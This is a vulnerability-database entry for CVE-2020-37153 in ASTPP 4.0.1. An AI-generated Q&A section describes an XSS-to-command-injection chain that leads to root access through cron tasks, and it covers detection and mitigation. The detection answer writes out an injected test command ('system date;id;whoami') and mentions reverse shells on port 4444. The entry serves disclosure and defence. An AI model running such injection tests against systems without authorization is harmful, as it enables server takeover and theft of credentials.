CVE-2020-37153
Command Injection and XSS in ASTPP 4.0.1 Enable Root Code Execution
Publication date: 2026-02-11
Last updated on: 2026-02-20
Assigner: VulnCheck
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| inextrix | astpp | 4.0.1 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2020-37153 affects ASTPP version 4.0.1, an open-source VoIP billing platform. It contains multiple critical security flaws including cross-site scripting (XSS) and command injection vulnerabilities within the SIP device configuration and plugin management interfaces.
Attackers can exploit these vulnerabilities by injecting malicious HTML or JavaScript code into SIP device parameters, hijacking administrator sessions through stolen cookies, and then executing arbitrary system commands via the plugin installation interface.
The attack chain can escalate to executing code with root privileges by manipulating cron tasks due to misconfigured cron job settings, allowing full remote root access on affected Linux systems.
How can this vulnerability impact me? :
This vulnerability can have severe impacts including unauthorized remote code execution with root privileges, complete system compromise, and data theft.
- Attackers can hijack administrator sessions, gaining full control over the ASTPP system.
- They can execute arbitrary commands on the server, potentially installing backdoors or malware.
- Root-level access allows attackers to manipulate system files, escalate privileges, and maintain persistent control.
- Sensitive configuration files containing database credentials and other critical information can be stolen, enabling further exploitation.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
I don't know
How can this vulnerability be detected on my network or system? Can you suggest some commands?
Detection of this vulnerability involves checking for signs of command injection and cross-site scripting (XSS) in the SIP device configuration and plugin management interfaces of ASTPP 4.0.1.
One approach is to test the SIP device parameters by injecting HTML or JavaScript payloads into fields such as SIP Caller Number and Caller Name to see if input validation is bypassed.
Example commands to test command injection via the plugin installation interface include running system commands like `system date;id;whoami` through the web interface.
Additionally, monitoring for unusual cron jobs or scheduled tasks that could be running with root privileges may indicate exploitation, as attackers can manipulate cron tasks to execute arbitrary code.
Network detection can also include monitoring for reverse shell connections, such as Python-based reverse shells connecting back to attacker IPs on uncommon ports (e.g., port 4444).
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include applying patches or upgrading ASTPP to a version where these vulnerabilities are fixed.
If patching is not immediately possible, restrict access to the SIP device configuration and plugin management interfaces to trusted administrators only.
Disable or restrict the ability to install or manage plugins through the web interface to prevent command injection.
Review and secure cron jobs and scheduled tasks to prevent unauthorized modification or execution of commands with root privileges.
Monitor network traffic for suspicious connections, especially reverse shells or unexpected outbound connections from the ASTPP server.
Implement strong input validation and session management controls to prevent XSS and session hijacking.